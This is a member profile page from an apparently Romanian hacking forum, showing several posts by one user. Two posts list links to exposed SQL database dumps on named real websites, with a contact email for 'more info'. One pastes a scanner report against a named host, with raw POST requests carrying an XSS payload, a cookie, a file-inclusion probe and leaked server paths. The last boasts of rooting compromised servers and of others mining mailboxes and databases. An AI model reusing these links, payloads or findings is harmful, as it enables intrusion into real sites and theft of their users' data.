Jump to content

Daddymx79

Members
  • Posts

    5
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Daddymx79's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. [+]diavola => http://oldarms.ru/db.sql [+]diavola => http://www.hpcalc.org/database.sql [+]diavola => http://1000goals.com/database.sql [+]diavola => http://20832.com/db.sql [+]diavola => http://alibra.ru/db.sql [+]diavola => http://baby-teva.ru/dump.sql [+]diavola => http://brand-trust.de/dump.sql [+]diavola => http://gkp.cc/db.sql [+]diavola => http://www.scomunicando.it/database.sql [+]diavola => http://www.sagafilm.ro/database.sql [+]diavola => http://www.pss.bg/mysqldump.sql ustupidmf@tiscali.it for more info ...
  2. [+]diavola => http://oldarms.ru/db.sql [+]diavola => http://www.hpcalc.org/database.sql [+]diavola => http://1000goals.com/database.sql [+]diavola => http://20832.com/db.sql [+]diavola => http://alibra.ru/db.sql [+]diavola => http://baby-teva.ru/dump.sql [+]diavola => http://brand-trust.de/dump.sql [+]diavola => http://gkp.cc/db.sql [+]diavola => http://www.scomunicando.it/database.sql [+]diavola => http://www.sagafilm.ro/database.sql [+]diavola => http://www.pss.bg/mysqldump.sql ustupidmf@tiscali.it for more info ...
  3. Ca n-ai ce cauta pe-aici ?!
  4. Ustupid MFU to suport show details Apr 2 This vulnerability affects /host/phrame.php. Discovered by: Scripting (XSS.script). URL encoded POST input action was set to 1<ScRiPt >prompt(946395)</ScRiPt> POST /host/phrame.php HTTP/1.1Content-Length: 131Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=gjk9h978ygb9797h98h99h9898; toplabs=a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A20%3A%22ceva%40cevaa.ro%22%3Bs%3A4%3A%22pass%22%3Bs%3A44%3A%22O77777777777encodebase64%3D%22%3Bs%3A2%3A%22no%22%3Bi%3A10%3B%7DHost: www.xhost.roConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +Bing Help Home) action=1%3cScRiPt%20%3eprompt%28946395%29%3c%2fScRiPt%3e&isCripted=&password=parola&rememberMy=on&username=ceva@ceva.ro Notice: No mappings found for action '1' in /home/www/lib/phrame/ActionController.php on line 128 Fatal error: Call to a member function getName() on a non-object in /home/www/lib/phrame/ActionController.php on line 144 /host/index.php?view=1some_inexistent_file_with_long_name HTTP/1.1Cookie: PHPSESSID=11111111111111111111111111; toplabs=a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A20%3A%22ceva%40ceva.ro22%3Bs%3A4%3A%22pass%22%3Bs%3A44%3A%22encodebase64O%3A2%3A%22no%22%3Bi%3A10%3B%7DHost: www.xhost.roConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +Bing Help Home) This vulnerability affects /host/panel.php. Discovered by: Scripting (File_Inclusion.script). <b>Warning</b>: file_get_contents(1some_inexistent_file_with_long_name) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/home/www/lib/toplabs/ui/Page.php</b> on line <b>286</b> GET /host/panel.php?view=1some_inexistent_file_with_long_name HTTP/1.1Cookie: Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286 Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299 Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304 Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313 Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286 Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299 Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304 Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313 This vulnerability affects /host/phrame.php. Discovered by: Scripting (Error_Message.script). Attack details URL encoded POST input action was set to Error message found: <b>Fatal error</b>: Call to a member function getName() on a non-object in <b>/home/www/lib/phrame/ActionController.php</b> on line <b>144</b><br /> Notice: No mappings found for action '' in /home/www/lib/phrame/ActionController.php on line 128 Fatal error: Call to a member function getName() on a non-object in /home/www/lib/phrame/ActionController.php on line 144 Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286 Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299 Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304 Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313
  5. UstupidMF Nu te contrazic,chiar ai dreptate in ceea ce ma intereseaza pe mine si cam ce fac eu spre deosebire de majoritatea! Normal ca nu avem aceleashi interese,asta ne deosebeste si diferentiaza unu fata de celalalt. Problema pe care o am eu cu "Haxorii" si toti incompetentii de pe forumul asta si mirc care se dau ceea ce nu sunt. In urma cu ceva ani am realizat ca toti pe care-i idolatrizam probabil si toti care-i vedeam capabili sau dovedit a fi niste incompetenti! Pai numai eu stiu de cate ori imi venea sa sparg computerul ca nu reuseam sa rezolv o eroare si de fiecare data cand intrebam pe vreun "Profesor in Linux" "Evita sa evite un raspuns" . Asa ca am inceput sa observ ce rang poarta fiecare si crede-ma ca ii stiu pe toti,nu exista "Hackeri in romania"!!! Legat de rootatul serverelor: Pe tine te intereseaza sa rootezi serverele prinse, pe majoritatea de aici ii intereseaza cum sa obtina informatii din mailuri, db-uri etc. Nu e vina comunitatii ca nu impartasiti aceleasi "pasiuni". Care-i logica ?! Eu ajungand sa rootez serverele sunt cu un pas inaintea voastra si "tot voi" trebuie sa apelati la cunostintele mele pt acele baze de date si informatii.
×
×
  • Create New...